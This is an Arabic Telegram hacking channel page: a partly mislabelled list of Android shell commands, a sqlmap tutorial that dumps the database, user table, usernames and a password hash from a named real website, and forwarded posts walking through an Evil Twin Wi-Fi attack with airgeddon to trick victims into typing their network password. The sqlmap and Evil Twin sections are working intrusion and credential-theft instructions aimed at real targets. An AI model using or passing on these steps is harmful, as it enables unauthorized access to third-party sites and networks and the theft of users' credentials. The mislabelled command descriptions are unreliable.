افضل برامج وادوات
3.23K subscribers
30 photos
1 video
36 files
280 links
برامج مفيده للهكرز والمبرمجين وغيرهم
Download Telegram
 ls /system/bin am


2- أوامر خاصة بتشغيل الصوتيات:


amix aplay


3-أوامر خاصة بالتسجيل الصوتي:

arec


4- مدير النسخ الاحتياطي - نوع الأمر في حد ذاته للحصول على الوثائق

bmgr


5-تغيير تاثيرات اقلاع الهاتف/ قد يحتم عليك اعادة تشغيل الاندرويد:

bootanimation


6-انسخ محتويات الملف إلى الإخراج القياسي

brcm_patchram_plus
bugreport
 cat


7- تغيير صيغة الملف (على سبيل المثال، ما إذا كان يمكن mp3 أو txt.)

chmod


8-مقارنة ملفين :

cmp


9- اظهار التاريخ والوقت الحالي تلقائيا:

Date


7-ادارة جميع مساحات الداكرة الموجودة :

debuggerd
dexopt
df


8-اظهار الاعدادات الصحيحة للشبكات (البلوتوت ,الواي فاي ...)

dhcpcd dmesg dnsmasq dumpstate dumpsys dvz fsck_msdos gdbserver getevent getprop gzip hciattach hd id ifconfig


9- إظهار العمليات الحالية باستخدام واجهات الشبكة (أعلى، ولكن للشبكات)

iftop



10-إدارة جدار الحماية :

ime input insmod installd ioctl ionice iptables


11-إرسال إشارات إلى العمليات:

keystore
keystore_cli
kill


12-قائمة الملفات:

logwrapper
ls


13-قائمة العمليات النشطة:

nandread ndc netcfg netd netstat newfs_msdos notify omx_tests pand ping pm pppd printenv ps


14-التحكم بوضعية الجهاز :

qemu-props qemud racoon radiooptions reboot


15-اعداد وقت الايقاف و التشغيل التلقائي لوظائف الاندرويد:

rmmod route rtp_test run-as schedtest schedtop sdcard sdptool sendevent service servicemanager setconsole setprop setup_fs sh showlease sleep smd stagefright start


16-اظهار اكثر المستهلكات للمعالج:

surfaceflinger svc sync system_server tc testid3 toolbox top
👍2
شرح اختراق مواقع بستعمال sqlmap


بسم الله الرحمن الرحيم
السلام عليكم ورحمة الله وبركاته
  الكل يعرف انه ثغرات sql
 من اقوى واكثر الثغرات انتشارا واحيانا تاخذ وقت في عملية الأستهداف ولاكن الان تستطيع استهداف المواقع المصابة بكل سرعة
اسم الأداة :sqlmap
لغة البرمجة : python
الأن كيفية استخدام الاداة في عملية الحقن
اولا : استخراج اسماء قواعد البيانات
لنقل ان هذا الموقع مصاب بثغرة sql
كود:
http://www.bcspeakers.com/page.php?id=22
وكلنا نعرف كيفية الفحص وهي باضافة ' الى نهاية الرابط واذا وجد خطأ كان الموقع مصاب
الأن الأمر المستخدم في استخراج القواعد لهذا الموقع
كود:
python sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 --dbs
النتيجة
كود:
available databases [2]:
[*] information_schema
[*] www-bcspeakerstest
مثل ما شفتو تم استخراج القواعد والان القاعدة المستهدفة هي " www-bcspeakerstest"
ثانيا : استخراج الجداول
القاعدة المستهدفة هي " www-bcspeakerstest"
سوف يكون الأمر بهذا الشكل
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest --tables
والنتيجة كبيرة لن اضعها لانها تتكون من 59 جدول على كل حال انا وجدت الجدول المستهدف وهو "_user"
ثالثا : استخراج الأعمدة
الان نأتي الى استخراج الأعمدة الموجودة في جدول "_user"
الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user --columns
والنتيجة كالتالي
كود:
+----------+---------------------------+
| Column   | Type                      |
+----------+---------------------------+
| id_user  | int(10) unsigned zerofill |
| password | text                      |
| username | text                      |
+----------+---------------------------+
كما ترون الأعمدة المستهدفة هي
password
username
رابعا : اسخراج البيانات من الاعمدة
العمود الاول هو عامود اسم المستخدم "username" سوف يكون الكود كالتالي
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C username --dump
النتيجة
كود:
+--------------+
| username     |
+--------------+
| becspeak2803 |
| becspeak2803 |
+--------------+
كما ترون استخرجنا اسم المستخدم
والان نأتي الى استخراج الباسورود
اكود مثل السابق مع تغيير اسم العامود الى عامود الباسوورد
كود:
python sqlmap/sqlmap.py -u http://www.bcspeakers.com/page.php?id=22 -D www-bcspeakerstest -T _user -C password --dump
سوف تسألك الأداة اذا كنت تريد محاولة مقارنة الهاش مع قاعدة البيانات المرفقة باالأداة
كود:
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q]
تختار مثل ما نت عاوز
انا اخترت لا لتسريع العملية والنتيجة كالتالي
كود:
+----------------------------------+
| password                         |
+----------------------------------+
| 286adae502ad9d5ab8c4f8644050b448 |
| 286adae502ad9d5ab8c4f8644050b448 |
+----------------------------------+
كما ترون تم استخراج البيانات بسرعة كبيرة
👍1
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هجوم التوأم الشرير هذه الطريقة تمكنك من الهجوم على الشبكه وانشاء شبكه وهمية بنفس اسم واي فاي الضحيه واخفاء الشبكه الأصليه للضحيه ايضا سنقوم ببث نفس اسم الشبكه مما يوهم الضحيه انها نفس شبكة الواي فاي wifi ألأصلية
Forwarded from BLACK HAT ISLAMIC (العميلة X)
وحين دخول الضحيه الى الشبكة سوف تلزمه بكتابه باسوورد الحقيقي للشبكة حتى يستطيع الدخول الى شبكة الواي فاي wifi
وعندما يقوم الضحيه بكتابه الرقم السري لشبكة الwifi سوف يصلك الرقم السري الصحيح وبذالك تستطيع اختراق الشبكة بنجاح
Forwarded from BLACK HAT ISLAMIC (العميلة X)
هذه الطريقة تحتاج الى نظام Kali Linux
Forwarded from BLACK HAT ISLAMIC (العميلة X)
واداة Airgeddon
Forwarded from BLACK HAT ISLAMIC (العميلة X)
اولا نقوم بفتح الترمنال
Forwarded from BLACK HAT ISLAMIC (العميلة X)
امر فتح الاداة
cd airgeddon


sudo bash ./airgeddon.sh
Forwarded from BLACK HAT ISLAMIC (العميلة X)
سوف تفتح معك الاداة كما هو موضح في الصورة
1😱1
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد تثبيت الاداة انتظر بضع دقائق ليقوم بتثبيت بعض الملفات الاضافية
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد ذلك ، سيتحقق الأداة من الوصول إلى الإنترنت حتى يمكنه تحديث نفسه في حالة وجود إصدار أحدث. عند الانتهاء من ذلك ، اضغط على Enter لتحديد مهيئ الشبكة المراد استخدامها
Forwarded from BLACK HAT ISLAMIC (العميلة X)
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد أن نختار الأنترفيس الخاص في الشبكة اللاسلكية الخاص بنا ، سننتقل إلى قائمة الهجوم الرئيسية الأن
Forwarded from BLACK HAT ISLAMIC (العميلة X)
Forwarded from BLACK HAT ISLAMIC (العميلة X)
اضغط 2 لوضع كارت الفا ALFA WIFI في وضع الشاشة. بعد ذلك ، حدد الخيار 7 لقائمة Evil Twin attacks وستظهر القائمة الفرعية لوحدة الهجوم
Forwarded from BLACK HAT ISLAMIC (العميلة X)
Forwarded from BLACK HAT ISLAMIC (العميلة X)
الأن حدد الهدف (الضحية)
Forwarded from BLACK HAT ISLAMIC (العميلة X)
الآن بعد أن أصبحنا في وحدة الهجوم الخاصة بنا ، حدد الخيار 9 لـ هجوم Evil Twin AP  سنحتاج إلى استكشاف الأهداف لذلك اضغط على Enter  وستظهر نافذة تظهر قائمة بجميع الشبكات التي تم اكتشافها ستحتاج إلى الانتظار قليلاً لتعبئة قائمة بجميع الشبكات القريبة
Forwarded from BLACK HAT ISLAMIC (العميلة X)
بعد تشغيل البحث لمدة 60 ثانية تقريبًا اخرج من النافذة الصغيرة ، وستظهر قائمة بالأهداف ستلاحظ أن الشبكات التي يستخدمها شخص ما تظهر باللون الأصفر مع وجود علامة نجمية بجوارها. هذا ضروري لأنك لا تستطيع اختراق شخص ما ليعطيك كلمة المرور إذا لم يكن هناك شخص متصل  على الشبكة في المقام الأول
Forwarded from BLACK HAT ISLAMIC (العميلة X)
حدد رقم الهدف الذي ترغب في مهاجمته واضغط على Enter 
👍1